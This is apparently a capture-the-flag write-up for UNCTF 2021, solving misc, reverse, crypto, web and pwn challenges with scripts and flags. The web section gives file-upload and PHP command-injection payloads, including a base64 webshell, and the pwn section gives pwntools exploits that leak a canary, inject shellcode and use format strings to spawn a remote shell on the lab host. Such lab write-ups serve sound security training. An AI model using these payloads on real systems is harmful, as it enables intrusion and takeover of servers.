Misc
Simple log audit
Before the attachment was updated, the flag was in the description. The update was added to the attachment at 18:00 on November 29.
In short, there are three base64 strings in total. Decode them and you can see the flag. Do you want to / forget the flag
UNCTF{CTF?YouShouJiuXing}
telecommunication fraud
Variant Caesar
```python
s = 'qi]m^roVibdVbXUU`h'
# f = 'unctf'
for i in range(len(s)):
    print(chr(ord(s[i]) + 4 + i), end='')
```
unctf{yauoreright}
Lead the flow, happy
Modify jpg height
UNCTF{BellalaBella}
LPL
Opening the PNG in 010 Editor reports an error, and the CRC values are exactly 000000??; reading those bytes as hex gives the decompression password.
Hex 4544476e622121, so the password is EDGnb!!
After unlocking, it gave a link to Bilibili (station B) and a time, so the flag was either in the comment area or in the bullet comments, and I found the flag in the comment area.
flag{LpL_zgbr_rNg_eDg777}
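The CRC check that the hex editor performs can be reproduced in a few lines. This is an added example, not code from the original writeup; it assumes one password byte per tampered chunk, and the sample PNG is constructed here from the hex string quoted above.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def chunk(ctype, data, crc=None):
    """Build one PNG chunk; crc=None stores the correct CRC-32."""
    if crc is None:
        crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def audit_crcs(png):
    """Return (offset, type, stored, computed) for every chunk whose CRC is wrong."""
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG file")
    bad, pos = [], 8
    while pos + 12 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        end = pos + 8 + length
        if end + 4 > len(png):
            raise ValueError("truncated chunk at offset %d" % pos)
        stored = struct.unpack(">I", png[end:end + 4])[0]
        # The CRC covers the chunk type and data, not the length field.
        computed = zlib.crc32(png[pos + 4:end]) & 0xFFFFFFFF
        if stored != computed:
            bad.append((pos, ctype.decode("latin-1"), stored, computed))
        pos = end + 4
    return bad

def hidden_bytes(bad):
    """Collect the low byte of every bad CRC that has the 000000?? shape."""
    return bytes(stored & 0xFF for _, _, stored, _ in bad if stored >> 8 == 0)

def build_sample():
    """Constructed sample: 1x1 PNG skeleton whose IDAT CRCs carry the bytes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    parts = [PNG_SIG, chunk(b"IHDR", ihdr)]
    for b in bytes.fromhex("4544476e622121"):
        parts.append(chunk(b"IDAT", b"\x00", crc=b))
    parts.append(chunk(b"IEND", b""))
    return b"".join(parts)

if __name__ == "__main__":
    print(hidden_bytes(audit_crcs(build_sample())))
```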
Handstand Shampoo
We are given a hexadecimal string; pasting it as hex in Notepad++ gives a byte-reversed jpg. Write a Python script to turn it back:
```python
open('flag.jpg','wb').write(open('key.txt','rb').read()[::-1])
```
Then I found that FFD8 was changed to D8FF, just change it back, and then I found the upper left corner
So I went to see the data section
After decoding, I'm serious. It's really unnecessary to change the Buddha's saying into a day..
unctf{it_is_easy_right?}
Re
ezlogin
Just find the key code and reverse it
```python
s = 'pqsd`fl{zmpZsag}wdYVkUNC'
for i in range(5):
    for j in range(3):
        print(chr(ord(s[i + j*8]) ^ 22), end='')
```
flag{refOrL@ve}
rejunk
The binary is padded with piles of junk code. Just look directly at the key parts.
```python
s = 'WQGULxb>2:ooh95=\'\'twk'
for i in range(len(s)):
    print(chr((ord(s[i]) ^ i) - 2), end='')
```
UNCTF{b781cbb29054db}
py_trade
Bytecode, it's over
```python
# true_flag = [115, 120, 96, 84, 116, 103, 105, 56, 102, 59, 127, 105, 115, 128, 95, 124, 139, 49]
flag = 'AAAAAAAAAAAAAAAAAA'
num = [0]*18
k = 0
for i in range(len(flag)):
    num[i] = (ord(flag[i])+i)^(k%3+1)
    num[len(flag)-i-1] = (ord(flag[len(flag)-i-1]) + (len(flag)-i-1))^(k%3+1)
    k += 1
print(num)
```
It turns out that each position is independent of the others, so each character can be brute-forced on its own by checking its value after a run.
```python
true_flag = [115, 120, 96, 84, 116, 103, 105, 56, 102, 59, 127, 105, 115, 128, 95, 124, 139, 49]
flag = ['A']*18
num = [0]*18
k = 0
for n in range(len(flag)):
    # try every printable character at position n
    for j in range(32,128):
        flag[n] = chr(j)
        for i in range(len(flag)):
            num[i] = (ord(flag[i])+i)^(k%3+1)
            num[len(flag)-i-1] = (ord(flag[len(flag)-i-1]) + (len(flag)-i-1))^(k%3+1)
            k += 1
        if(true_flag[n] == num[n]):
            flag[n] = chr(j)
            break
    # print(num)
print(''.join(flag))
#py_Trad3_1s_fuNny!
```
Just wrap it in UNCTF{}
UNCTF{py_Trad3_1s_fuNny!}
Crypto
easy_rsa
```python
import gmpy2
import binascii

q= 9961202707366965556741565662110710902919441271996809241009358666778850435448710324711706845973820669201482939820488174382325795134659313309606698334978471
p= 12525187149887628510447403881107442078833803097302579419605689530714690308437476207855511625840027119860834633695330551080761572835309850579517639206740101
c= 28587419802025513525354713621431206010395084854419372005671024739235625817936539010481222419824634956610184430308528941304950093228826213143262329902946812513518444587906469224383320964300417189270202019231856531012143472434842753891213128487132962453421971000901646523331476667655739056951415917218673801225
e = 65537

n = p*q
L = (p-1)*(q-1)
d = gmpy2.invert(e,L)
m = gmpy2.powmod(c,d,n)
print(binascii.unhexlify(hex(m)[2:]))
```
UNCTF{Th1s_1s_f1ag_f0r_unctf_2021!!}
Exploring medieval castles
Caesar + base64 + rail fence
UNCTF{subscribe_to_Xiangwandamowang}
Analyze badusb flow
This question doesn't put misc grass
```python
f = open('separate.txt','r').readlines()
# USB HID keyboard usage IDs -> characters
mappings = {
    0x04:"A", 0x05:"B", 0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G",
    0x0B:"H", 0x0C:"I", 0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",
    0x12:"O", 0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",
    0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2",
    0x20:"3", 0x21:"4", 0x22:"5", 0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9",
    0x27:"0", 0x28:"\n", 0x2a:"[DEL]", 0X2B:" ", 0x2C:" ", 0x2D:"-",
    0x2E:"=", 0x2F:"[", 0x30:"]", 0x31:"\\", 0x32:"~", 0x33:";", 0x34:"'",
    0x36:",", 0x37:"."
}
for i in range(len(f)):
    num = int(f[i][2:4],16)
    if(f[i][0] == '2'):
        # shift held: upper case
        if(num in mappings):
            print(mappings[num].upper(),end='')
    else:
        if (num in mappings):
            print(mappings[num].lower(), end='')
#output:UNCTF[Y0u-Are-very-n1ce]
```
The [] should be replaced by {}, because Shift was pressed.
UNCTF{Y0u-Are-very-n1ce}
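The manual [] to {} fix-up goes away if the decoder keeps a shifted and an unshifted character for every key. This is an added example, not the writeup's script; it assumes standard 8-byte HID boot keyboard reports (modifier, reserved, six keycodes) as hex lines, which is not necessarily the layout of separate.txt, and the sample reports are constructed.

```python
# USB HID usage IDs (keyboard page) -> two-character string: unshifted, shifted.
KEYS = {0x28: "\n\n", 0x2B: "\t\t", 0x2C: "  "}
for i, ch in enumerate("abcdefghijklmnopqrstuvwxyz"):
    KEYS[0x04 + i] = ch + ch.upper()
for i, pair in enumerate(["1!", "2@", "3#", "4$", "5%", "6^", "7&", "8*", "9(", "0)"]):
    KEYS[0x1E + i] = pair
for code, pair in zip(range(0x2D, 0x32), ["-_", "=+", "[{", "]}", "\\|"]):
    KEYS[code] = pair
for code, pair in zip(range(0x33, 0x39), [";:", "'\"", "`~", ",<", ".>", "/?"]):
    KEYS[code] = pair

SHIFT_MASK = 0x02 | 0x20   # left-shift and right-shift bits of the modifier byte
BACKSPACE = 0x2A

def decode_reports(lines):
    """Turn hex-encoded 8-byte keyboard reports into the text that was typed."""
    out, prev = [], set()
    for line in lines:
        raw = bytes.fromhex(line.strip().replace(":", ""))
        if len(raw) != 8:
            continue                      # not a boot keyboard report
        shifted = bool(raw[0] & SHIFT_MASK)
        current = {k for k in raw[2:8] if k > 0x03}   # 0x00-0x03 are not keys
        for key in raw[2:8]:
            if key not in current or key in prev:
                continue                  # empty slot, or key still held down
            if key == BACKSPACE:
                del out[-1:]
            elif key in KEYS:
                out.append(KEYS[key][1 if shifted else 0])
        prev = current
    return "".join(out)

# Constructed sample capture; all-zero lines are key releases.
SAMPLE = [
    "0200180000000000", "0000000000000000",   # shift+u -> U
    "0000110000000000", "0000000000000000",   # n
    "02002f0000000000", "0000000000000000",   # shift+[ -> {
    "00001e0000000000",                       # 1
    "00001e0600000000", "0000000000000000",   # 1 still held, c newly pressed
    "0000260000000000", "0000000000000000",   # 9 (typo)
    "00002a0000000000", "0000000000000000",   # backspace removes the 9
    "2000300000000000",                       # right shift + ] -> }
]

if __name__ == "__main__":
    print(decode_reports(SAMPLE))
```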
baby_rsa
dp leakage
```python
import gmpy2
import libnum

n= 27023180567533176673625876001733765250439008888496677405372613659387969480500400831799338479404533734632060401129194207025095826786316107611502577395964365591899893794206238112244571942694129959717225168573059987542436467778426312967832431595178558711258027999897974942046398583397445299861338203860420721585460676138091828032223153425728023656897880166788811969523526091221520293020106530587453637600349533427641518473788620430866128331962450325767202417824455886116760280239705754222948387172102353564657340216229891342124971948458724351338597649821310431397426705701275774039588035776573373417654649168810548916141
c= 3489599657527403893851973553294684608504140532554562294027722218597464669848608337663997115805201027340092733823019661706872544231209523772845492398492677185660213963118144668038183924970370481476141221609706208064428560732214361469135212057355342825193598971775551833240699393482839422273480793244841531126642199202744610656153155545415859410361595564197685655133074582118230993519133935533313364233668337427608419528430102794052261190930670933657287272452581248934890029409559234507626012423255430699687038808658327174609660874748540185589263800447650242593224189976058739054174360024536594384447518687126891675059
e= 65537

p = gmpy2.gcd(n,c)
q = n//p
phi = (q-1)*(p-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(libnum.n2s(int(m//p)))
```
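Why gcd(n, c) yields p in the script above, shown on small numbers. This is an added example, not code from the writeup; it assumes the challenge encrypted m = flag * p (which the final m//p implies), and the primes and message are constructed for the demonstration.

```python
from math import gcd

# Constructed parameters: two Mersenne primes and the usual public exponent.
P = 2**61 - 1
Q = 2**89 - 1
E = 65537

def encrypt_multiple_of_p(msg, p, q, e):
    """Encrypt m = int(msg) * p, the flawed padding assumed for this challenge."""
    n = p * q
    m = int.from_bytes(msg, "big") * p
    if m >= n:
        raise ValueError("message too long for this modulus")
    return n, pow(m, e, n)

def recover(n, c, e):
    """Factor n from the ciphertext alone, decrypt, and strip the factor p."""
    # m is a multiple of p, so m^e is too; reducing mod n = p*q keeps that,
    # hence p divides c and gcd(n, c) exposes it.
    p = gcd(n, c)
    if p in (1, n):
        raise ValueError("ciphertext shares no proper factor with n")
    q = n // p
    d = pow(e, -1, (p - 1) * (q - 1))
    # Decryption is still correct although gcd(m, n) != 1, because n is squarefree.
    m = pow(c, d, n)
    if m % p:
        raise ValueError("plaintext is not a multiple of p")
    flag = m // p
    return flag.to_bytes((flag.bit_length() + 7) // 8, "big")

if __name__ == "__main__":
    n, c = encrypt_multiple_of_p(b"UNCTF{demo}", P, Q, E)
    print(recover(n, c, E))
```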
Telecom fraud pro
I feel obvious rot47... (?
Although I still subtract first and find that there is a difference of 64 between unctf and unctf,
Anyway rot47, move 64 out
unctf{5Yir6Kej5LqG77yM6YKj5Liq5bCx5pivZmxhZw}
Don't decode the middle part. That's the flag.
Web
fuzz_md5
unctf is replaced with an empty string, so bypass it by double writing.
Brute-force an MD5 that begins with 66666:
```python
import hashlib

for i in range(9999999):
    data = str(i).encode()
    m = hashlib.md5(data)
    m = m.hexdigest()
    if(m[:5] == '66666'):
        print(i)
#1004649
```
babywrite
https://www.anquanke.com/post/id/241147#h3-18
https://www.cnblogs.com/doherasyang/p/14571302.html
This challenge is adapted from the original one and reports an error. I saw that the middleware was Apache, so I used .htaccess to obtain the flag.
The original challenge used POST. Here it is GET, so line feeds are written as %0a.
```
?filename=.htaccess&content=AddType application/x-httpd-p\%0Ahp .ppt%0Ap\%0Ahp_value a\%0Auto_append_file "p\%0Ahp://filter/convert.b\%0Aase64-decode/resource=mn.ppt"
?filename=mn.ppt&content=GIF89a12%0APD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg==
```
Finish
phpmysql
The challenge uses echo new $db_user($db_pwd); to execute the command.
Exception handling changes the normal flow of a script when a specified error occurs. Exception is the built-in exception handling class in PHP.
ReflectionClass and ReflectionMethod are common reflection classes, which can be understood as a mapping of a class.
This is the same point tested in ctfshow web109: RCE through an error. Although an error is reported, the inner command has already been executed. The class must have a __toString() magic method. Here, Exception, mysqli, ReflectionClass, etc. can be used.
```
POST:host=127.0.0.1&port=3306&pwd=system('ls /')&user=mysqli
POST:host=127.0.0.1&port=3306&pwd=system('tac /fllllaaaaag')&user=mysqli
```
Pwn
magic_int
An int overflow and a stack overflow of puts
puts counts the newline character. I kept using +8 for the offset to ret, but later I found that it was +7.
```python
from pwn import *

p = remote('node2.hackingfor.fun',30993)
# int overflow: 2147483648 wraps around as a signed 32-bit int
p.send(b'2147483648\x00')
p.recv()
payload = b'a'*(0x70+7)+p64(0x400781)
p.sendline(payload)
p.interactive()
```
fo
Leak the canary with a format string, then overflow the stack.
```python
from pwn import *

p=remote('node2.hackingfor.fun',36767)
context.log_level='debug'
# leak the canary through the format string
p.sendlineafter(b'you?\n',b'%17$p')
p.recvuntil(b'0x')
canary=int(p.recv(16),16)
success('canary:'+hex(canary))
# padding + canary + saved rbp + return address
p.sendlineafter(b'wait for your good news...\n',b'a'*0x58+p64(canary)+p64(0)+p64(0x40080d))
p.interactive()
```
sc
ret2shellcode
```python
from pwn import *

p=remote('node2.hackingfor.fun',31483)
context.arch='amd64'
context.log_level='debug'
# first input: the shellcode itself
p.sendlineafter(b'show me your Migic',asm(shellcraft.sh()))
# second input: overflow and return to the buffer at 0x601080
p.sendlineafter(b'Have you finished?\n',b'a'*0x18+p64(0x601080))
p.interactive()
```
ezfsb
Use printf to overwrite a small number and a large number, then overflow the stack to get the shell. Overwriting small and large numbers with a printf format string is covered on the wiki, and beginners can learn it there.
Then, after system('code '), call the read function, write /bin/sh as the parameter of system, and call system('bin/sh')
```python
from pwn import *

elf = ELF('./pwn')
context.log_level='debug'
p = remote('node2.hackingfor.fun',32119)
a_addr = 0x0804A050
p.recvuntil(b'hard!')
# payload = b'AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p'
# overwrite with a small number
payload = b'aa%7$naa' + p32(a_addr)
p.sendline(payload)
p.recvuntil(b'right')
p.recv()
# payload = b'AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p'
# overwrite with a large number
p.sendline(fmtstr_payload(5,{0x0804A04D:0x22}))
p.recvuntil(b'good')
# stack overflow: read(0, 0x804ab00, 4), then system(0x804ab00)
payload = b'a'*(0x74+4)+p32(elf.plt['read'])+p32(0x080486d9)+p32(0)+p32(0x804ab00)+p32(0x4)+p32(elf.plt['system'])+p32(0)+p32(0x804ab00)
p.sendline(payload)
p.interactive()
```